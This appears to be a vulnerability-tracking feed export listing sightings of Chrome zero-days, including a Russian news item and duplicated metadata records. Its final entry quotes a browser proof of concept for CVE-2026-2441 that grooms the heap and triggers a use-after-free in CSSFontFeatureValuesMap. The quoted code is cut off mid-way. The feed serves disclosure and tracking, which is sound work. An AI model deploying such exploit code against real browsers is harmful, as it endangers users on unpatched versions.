\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 0-day \u0432 Chrome, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445.\n\nCVE-2026-5281, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u0439 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 Chromium, \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0442\u0438\u043f\u0430 \u00ab\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u043e\u0441\u043b\u0435 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f\u00bb \u0432 Dawn, \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u043a\u0440\u043e\u0441\u0441\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435\u043d\u043d\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0430 WebGPU, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0439 \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u043c Chromium.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u0441\u0431\u043e\u0438 \u0432 \u0440\u0430\u0431\u043e\u0442\u0435 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430, \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0445, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u0435\u043c \u0438\u043b\u0438 \u0434\u0440\u0443\u0433\u043e\u0435 \u0430\u043d\u043e\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435.\n\n\u041a\u0430\u043a \u0437\u0430\u044f\u0432\u043b\u044f\u044e\u0442 \u0432 Google, \u0443 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0435\u0441\u0442\u044c \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 0-day \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445, \u043d\u043e \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u044d\u0442\u0438\u0445 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u043e\u0432 \u043d\u0435 \u0440\u0430\u0437\u0433\u043b\u0430\u0448\u0430\u044e\u0442\u0441\u044f.\n\n\u0414\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435, \u043a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u043e, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0441 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c.\n\nGoogle \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u0430\u043d\u0430\u043b\u0430 \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043d\u044b\u0445 \u041f\u041a. \u041d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0434\u043b\u044f Windows, macOS (146.0.7680.177/178) \u0438 Linux (146.0.7680.177).\n\n\u042d\u0442\u043e \u0443\u0436\u0435 \u0447\u0435\u0442\u0432\u0451\u0440\u0442\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f 0-day \u0432 Chrome, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0441 \u043d\u0430\u0447\u0430\u043b\u0430 \u0433\u043e\u0434\u0430.\n\n\u041d\u0430\u043f\u043e\u043c\u043d\u0438\u043c, \u043f\u0435\u0440\u0432\u0430\u044f (CVE-2026-2441) \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 \u0441\u043e\u0431\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0443 \u0430\u043d\u043d\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u0442\u0435\u0440\u0430\u0442\u043e\u0440\u0430 \u0432 CSSFontFeatureValuesMap (\u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0441\u0442\u0438\u043a \u0448\u0440\u0438\u0444\u0442\u043e\u0432 CSS \u0432 Chrome), \u043a\u043e\u0442\u043e\u0440\u0443\u044e Google\u00a0\u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0430 \u0432 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0444\u0435\u0432\u0440\u0430\u043b\u044f\u00a0.\n\n\u0414\u0432\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 CVE \u0432 Chrome,\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0440\u0430\u043d\u0435\u0435 \u0432 \u044d\u0442\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0435: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u00a0\u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u043e\u0433\u043e \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0430\u00a0\u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 2D-\u0433\u0440\u0430\u0444\u0438\u043a\u0438 Skia (CVE-2026-3909), \u0430 \u0432\u0442\u043e\u0440\u0430\u044f - \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u0434\u0432\u0438\u0436\u043a\u0435 V8 JavaScript \u0438 WebAssembly (CVE-2026-3910).\n\n\u0412 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443 Google \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0430 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438\u00a08 \u043d\u0443\u043b\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438, \u043c\u043d\u043e\u0433\u0438\u0435 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0433\u0440\u0443\u043f\u043f\u043e\u0439 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0443\u0433\u0440\u043e\u0437 Google (TAG), \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u043d\u0438\u0435\u043c \u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.", "creation_timestamp": "2026-04-01T13:00:06.000000Z"} https://vulnerability.circl.lu/sighting/c75a44cb-1ced-4e4e-bd77-7eb7a32ae629/export Wed, 01 Apr 2026 13:00:06 +0000 3be725bb-1fbd-41ae-98af-4886f3ade629 https://vulnerability.circl.lu/sighting/3be725bb-1fbd-41ae-98af-4886f3ade629/export {"uuid": "3be725bb-1fbd-41ae-98af-4886f3ade629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-24415", "type": "published-proof-of-concept", "source": "Telegram/S964UnaAzc4FW7CZCUbAm7wNqkztcWapRmtGqRf9U9sXCaA", "content": "", "creation_timestamp": "2026-04-12T03:00:07.000000Z"} {"uuid": "3be725bb-1fbd-41ae-98af-4886f3ade629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-24415", "type": "published-proof-of-concept", "source": "Telegram/S964UnaAzc4FW7CZCUbAm7wNqkztcWapRmtGqRf9U9sXCaA", "content": "", "creation_timestamp": "2026-04-12T03:00:07.000000Z"} https://vulnerability.circl.lu/sighting/3be725bb-1fbd-41ae-98af-4886f3ade629/export Sun, 12 Apr 2026 03:00:07 +0000 9ed54da6-b70d-4b1b-aa23-a6a6ffcae247 https://vulnerability.circl.lu/sighting/9ed54da6-b70d-4b1b-aa23-a6a6ffcae247/export {"uuid": "9ed54da6-b70d-4b1b-aa23-a6a6ffcae247", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "published-proof-of-concept", "source": "https://t.me/xakep_ru/19245", "content": "\u0423\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u0432 \u043d\u0438\u043a\u0443\u0434\u0430. \u0420\u0430\u0437\u0431\u0438\u0440\u0430\u0435\u043c \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u0439 \u0431\u0430\u0433 use after free \u0432 Chrome\n\n\ud83d\udc51 \u0421\u0442\u0430\u0442\u044c\u044f \u0434\u043b\u044f \u043f\u043e\u0434\u043f\u0438\u0441\u0447\u0438\u043a\u043e\u0432\n\n\u0422\u044b \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0448\u044c \u0441\u0430\u0439\u0442, \u0430\u00a0\u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u0443\u0436\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432\u00a0\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435. \u0414\u0430\u043b\u044c\u0448\u0435 \u043e\u043d \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0438\u0437\u00a0\u043f\u0435\u0441\u043e\u0447\u043d\u0438\u0446\u044b \u0438\u00a0\u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u043a\u043e\u043c\u043f. \u041a\u00a0\u0442\u0430\u043a\u0438\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c use after free \u0432\u00a0\u0434\u0432\u0438\u0436\u043a\u0435 CSS Chrome (CVE-2026-2441). \u041f\u043e\u043a\u0430 \u0442\u044b \u0447\u0438\u0442\u0430\u0435\u0448\u044c \u0441\u0442\u0430\u0442\u044c\u044e, \u0442\u044b\u0441\u044f\u0447\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u0441\u0438\u0434\u0435\u0442\u044c \u043d\u0430\u00a0\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430.\n\nhttps://xakep.ru/2026/04/15/chrome-use-after-free/", "creation_timestamp": "2026-04-15T04:37:07.000000Z"} {"uuid": "9ed54da6-b70d-4b1b-aa23-a6a6ffcae247", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "published-proof-of-concept", "source": "https://t.me/xakep_ru/19245", "content": "\u0423\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u0432 \u043d\u0438\u043a\u0443\u0434\u0430. \u0420\u0430\u0437\u0431\u0438\u0440\u0430\u0435\u043c \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u0439 \u0431\u0430\u0433 use after free \u0432 Chrome\n\n\ud83d\udc51 \u0421\u0442\u0430\u0442\u044c\u044f \u0434\u043b\u044f \u043f\u043e\u0434\u043f\u0438\u0441\u0447\u0438\u043a\u043e\u0432\n\n\u0422\u044b \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0448\u044c \u0441\u0430\u0439\u0442, \u0430\u00a0\u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u0443\u0436\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432\u00a0\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435. \u0414\u0430\u043b\u044c\u0448\u0435 \u043e\u043d \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0438\u0437\u00a0\u043f\u0435\u0441\u043e\u0447\u043d\u0438\u0446\u044b \u0438\u00a0\u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u043a\u043e\u043c\u043f. \u041a\u00a0\u0442\u0430\u043a\u0438\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c use after free \u0432\u00a0\u0434\u0432\u0438\u0436\u043a\u0435 CSS Chrome (CVE-2026-2441). \u041f\u043e\u043a\u0430 \u0442\u044b \u0447\u0438\u0442\u0430\u0435\u0448\u044c \u0441\u0442\u0430\u0442\u044c\u044e, \u0442\u044b\u0441\u044f\u0447\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u0441\u0438\u0434\u0435\u0442\u044c \u043d\u0430\u00a0\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430.\n\nhttps://xakep.ru/2026/04/15/chrome-use-after-free/", "creation_timestamp": "2026-04-15T04:37:07.000000Z"} https://vulnerability.circl.lu/sighting/9ed54da6-b70d-4b1b-aa23-a6a6ffcae247/export Wed, 15 Apr 2026 04:37:07 +0000 1d9b51f0-e212-4791-8691-f63cbe41d394 https://vulnerability.circl.lu/sighting/1d9b51f0-e212-4791-8691-f63cbe41d394/export {"uuid": "1d9b51f0-e212-4791-8691-f63cbe41d394", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "seen", "source": "https://gist.github.com/myakura/257ea759f544bd85fe88b99be0e52088", "content": "", "creation_timestamp": "2026-04-27T19:50:38.000000Z"} {"uuid": "1d9b51f0-e212-4791-8691-f63cbe41d394", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "seen", "source": "https://gist.github.com/myakura/257ea759f544bd85fe88b99be0e52088", "content": "", "creation_timestamp": "2026-04-27T19:50:38.000000Z"} https://vulnerability.circl.lu/sighting/1d9b51f0-e212-4791-8691-f63cbe41d394/export Mon, 27 Apr 2026 19:50:38 +0000 0027e661-2a33-4a9d-808a-a671b78f4a44 https://vulnerability.circl.lu/sighting/0027e661-2a33-4a9d-808a-a671b78f4a44/export {"uuid": "0027e661-2a33-4a9d-808a-a671b78f4a44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "seen", "source": "https://bsky.app/profile/exploitdb-bot.bsky.social/post/3mkpdnsitkq2y", "content": "\ud83d\udea8 New Exploit: Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap\n\ud83d\udccb CVE: CVE-2026-2441\n\ud83d\udc64 Author: nu11secur1ty\n\n\ud83d\udd17 https://www.exploit-db.com/exploits/52542\n\n#ExploitDB #InfoSec #CyberSecurity #CVE-2026-2441", "creation_timestamp": "2026-04-30T09:51:12.682474Z"} {"uuid": "0027e661-2a33-4a9d-808a-a671b78f4a44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "seen", "source": "https://bsky.app/profile/exploitdb-bot.bsky.social/post/3mkpdnsitkq2y", "content": "\ud83d\udea8 New Exploit: Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap\n\ud83d\udccb CVE: CVE-2026-2441\n\ud83d\udc64 Author: nu11secur1ty\n\n\ud83d\udd17 https://www.exploit-db.com/exploits/52542\n\n#ExploitDB #InfoSec #CyberSecurity #CVE-2026-2441", "creation_timestamp": "2026-04-30T09:51:12.682474Z"} https://vulnerability.circl.lu/sighting/0027e661-2a33-4a9d-808a-a671b78f4a44/export Thu, 30 Apr 2026 09:51:12 +0000 24633c21-d18f-4f79-8843-f3925f056fda https://vulnerability.circl.lu/sighting/24633c21-d18f-4f79-8843-f3925f056fda/export {"uuid": "24633c21-d18f-4f79-8843-f3925f056fda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/83252", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-2441\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a MartinaStarone\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a HTML\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-07 18:15:14\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-07T19:00:05.000000Z"} {"uuid": "24633c21-d18f-4f79-8843-f3925f056fda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/83252", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-2441\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a MartinaStarone\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a HTML\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-07 18:15:14\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-07T19:00:05.000000Z"} https://vulnerability.circl.lu/sighting/24633c21-d18f-4f79-8843-f3925f056fda/export Thu, 07 May 2026 19:00:05 +0000 47f30829-10ce-4301-9954-33b946dd69c7 https://vulnerability.circl.lu/sighting/47f30829-10ce-4301-9954-33b946dd69c7/export {"uuid": "47f30829-10ce-4301-9954-33b946dd69c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "seen", "source": "https://gist.github.com/lyubeka99/e1b282e74e4000fe00489eb03e58a731", "content": "\n\n\n\n \n CVE-2026-2441 PoC \u2014 CSSFontFeatureValuesMap UAF\n \n body { font-family: monospace; background: #111; color: #0f0; padding: 20px; }\n #log { white-space: pre; font-size: 13px; }\n .ok { color: #0f0; }\n .warn { color: #ff0; }\n .fail { color: #f44; }\n .info { color: #08f; }\n \n\n \n \n @font-feature-values VulnTestFont {\n @styleset {\n entry_a: 1;\n entry_b: 2;\n entry_c: 3;\n entry_d: 4;\n entry_e: 5;\n entry_f: 6;\n entry_g: 7;\n entry_h: 8;\n }\n }\n \n\n\n\nCVE-2026-2441 \u2014 CSSFontFeatureValuesMap UAF PoC\n\n\n\n\n\"use strict\";\n\nconst log = document.getElementById(\"log\");\nfunction print(msg, cls = \"\") {\n const span = document.createElement(\"span\");\n span.className = cls;\n span.textContent = msg + \"\\n\";\n log.appendChild(span);\n}\n\nprint(\"[*] CVE-2026-2441 PoC starting...\", \"info\");\nprint(\"[*] Target: CSSFontFeatureValuesMap iterator invalidation (UAF)\", \"info\");\nprint(\"[*] Blink source: css_font_feature_values_map.cc\", \"info\");\nprint(\"\");\n\n// \u2500\u2500\u2500 1. Obtain the CSSOM object \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nconst sheet = document.getElementById(\"target-style\").sheet;\nif (!sheet || sheet.cssRules.length === 0) {\n print(\"[!] ERROR: @font-feature-values rule not found.\", \"fail\");\n throw new Error(\"CSS rule not found\");\n}\n\nconst rule = sheet.cssRules[0];\nprint(\"[+] CSSFontFeatureValuesRule found: \" + rule.fontFamily, \"ok\");\n\n// CSSFontFeatureValuesMap object\n// In Blink, this object is a CSSOM wrapper around the FontFeatureAliases HashMap.\nconst map = rule.styleset;\nif (!map) {\n print(\"[!] ERROR: rule.styleset is not accessible. Browser may not support this API.\", \"fail\");\n throw new Error(\"styleset not available\");\n}\nprint(\"[+] CSSFontFeatureValuesMap obtained. Size: \" + map.size, \"ok\");\nprint(\"\");\n\n// \u2500\u2500\u2500 2. Heap Grooming \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n// Goal: Bring the heap into a predictable state.\n// By creating multiple @font-feature-values rules, we allocate same-sized\n// FontFeatureAliases objects. This facilitates memory reclaim after the UAF.\nprint(\"[*] Starting heap grooming...\", \"info\");\n\nconst groomRules = [];\nconst groomStyle = document.createElement(\"style\");\ndocument.head.appendChild(groomStyle);\n\nfor (let i = 0; i < 50; i++) {\n groomStyle.sheet.insertRule(\n `@font-feature-values GroomFont${i} { @styleset { g${i}: ${i}; } }`,\n groomStyle.sheet.cssRules.length\n );\n groomRules.push(groomStyle.sheet.cssRules[groomStyle.sheet.cssRules.length - 1]);\n}\nprint(\"[+] \" + groomRules.length + \" groom objects created.\", \"ok\");\n\n// \u2500\u2500\u2500 3. UAF Trigger \u2014 Iterator Invalidation \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n//\n// Vulnerability mechanism (unpatched Blink):\n//\n// When CreateIterationSource() is called:\n// FontFeatureValuesMapIterationSource(map, aliases_)\n// \u2192 aliases_ (raw pointer) points to the internal HashMap\n// \u2192 iterator_ = aliases_->begin()\n//\n// When FetchNextItem() is called:\n// \u2192 iterator_->key is read\n//\n// If map.delete() or map.set() is called in between:\n// \u2192 HashMap rehashes (new allocation, old storage freed)\n// \u2192 aliases_ now points to freed memory (dangling pointer)\n// \u2192 iterator_ is also invalidated\n// \u2192 Next FetchNextItem() \u2192 USE-AFTER-FREE \u2192 CRASH\n//\nprint(\"[*] Starting UAF trigger...\", \"info\");\nprint(\"[*] Strategy: iterator.next() + map.delete() + map.set() x N (force rehash)\", \"info\");\nprint(\"\");\n\nlet crashDetected = false;\nlet iterationCount = 0;\n\ntry {\n // Create iterator \u2014 at this point Blink creates an IterationSource with a raw pointer\n const iterator = map.entries();\n\n let step = 0;\n while (step < 20) {\n // iterator.next() \u2192 FetchNextItem() call\n // Unpatched Blink: reads through dangling pointer\n const result = iterator.next();\n \n if (result.done) {\n print(\" [.] Iterator exhausted (step=\" + step + \")\", \"warn\");\n break;\n }\n\n const [key, value] = result.value;\n iterationCount++;\n print(\" [>] Entry: \" + key + \" = \" + JSON.stringify(value) + \" (step=\" + step + \")\", \"ok\");\n\n // \u2500\u2500 MUTATION: Modify the HashMap \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n // This triggers a HashMap rehash.\n 